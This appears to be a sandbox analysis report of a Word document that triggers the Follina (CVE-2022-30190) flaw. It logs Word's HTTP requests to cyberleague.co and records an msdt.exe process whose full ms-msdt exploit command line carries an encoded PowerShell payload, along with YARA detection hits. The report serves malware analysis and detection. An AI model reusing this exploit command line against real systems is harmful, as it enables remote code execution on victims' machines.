2022-06-03 21:03:19 UTC | 7 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:19 GMT
Content-Type: text/html
Content-Length: 5092
Connection: close
Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
ETag: "13e4-5e063d0e1ca1e"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49749 | 13.250.15.191 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-06-03 21:03:20 UTC | 7 | OUT | HEAD /th1s.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: cyberleague.co
Connection: Keep-Alive
2022-06-03 21:03:20 UTC | 7 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:20 GMT
Content-Type: text/html
Content-Length: 5092
Connection: close
Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
ETag: "13e4-5e063d0e1ca1e"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.3 | 49750 | 13.250.15.191 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-06-03 21:03:20 UTC | 7 | OUT | OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: cyberleague.co
2022-06-03 21:03:21 UTC | 7 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:21 GMT
Content-Type: text/html
Content-Length: 0
Connection: close
Allow: GET,POST,OPTIONS,HEAD,TRACE


Session ID: 7
Source IP: 192.168.2.3
Source Port: 49751
Destination IP: 13.250.15.191
Destination Port: 443
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-06-03 21:03:21 UTC | kBytes transferred: 8 | Direction: OUT
Data:
HEAD /th1s.html HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: cyberleague.co

Timestamp: 2022-06-03 21:03:22 UTC | kBytes transferred: 8 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:22 GMT
Content-Type: text/html
Content-Length: 5092
Connection: close
Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
ETag: "13e4-5e063d0e1ca1e"
Accept-Ranges: bytes


Session ID: 8
Source IP: 192.168.2.3
Source Port: 49752
Destination IP: 13.250.15.191
Destination Port: 443
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-06-03 21:03:22 UTC | kBytes transferred: 8 | Direction: OUT
Data:
GET /th1s.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: cyberleague.co
If-Modified-Since: Wed, 01 Jun 2022 14:36:34 GMT
If-None-Match: "13e4-5e063d0e1ca1e"
Connection: Keep-Alive

Timestamp: 2022-06-03 21:03:23 UTC | kBytes transferred: 8 | Direction: IN
Data:
HTTP/1.1 304 Not Modified
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:23 GMT
Connection: close
Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
ETag: "13e4-5e063d0e1ca1e"
Accept-Ranges: bytes


Session ID: 9
Source IP: 192.168.2.3
Source Port: 49753
Destination IP: 13.250.15.191
Destination Port: 443
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-06-03 21:03:24 UTC | kBytes transferred: 9 | Direction: OUT
Data:
HEAD /th1s.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: cyberleague.co
Connection: Keep-Alive

Timestamp: 2022-06-03 21:03:24 UTC | kBytes transferred: 9 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:24 GMT
Content-Type: text/html
Content-Length: 5092
Connection: close
Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
ETag: "13e4-5e063d0e1ca1e"
Accept-Ranges: bytes


Target ID: 0
Start time: 23:03:06
Start date: 03/06/2022
Path: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase: 0xe80000
File size: 1937688 bytes
MD5 hash: 0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 1
Start time: 23:03:11
Start date: 03/06/2022
Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Wow64 process (32bit): true
Commandline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Imagebase: 0xb80000
File size: 466688 bytes
MD5 hash: EA19F4A0D18162BE3A0C8DAD249ADE8C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 9
Start time: 23:03:27
Start date: 03/06/2022
Path: C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Imagebase: 0xab0000
File size: 1508352 bytes
MD5 hash: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.553703750.0000000003140000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.554020054.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.553580729.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.553717920.0000000003148000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
Reputation: moderate

No disassembly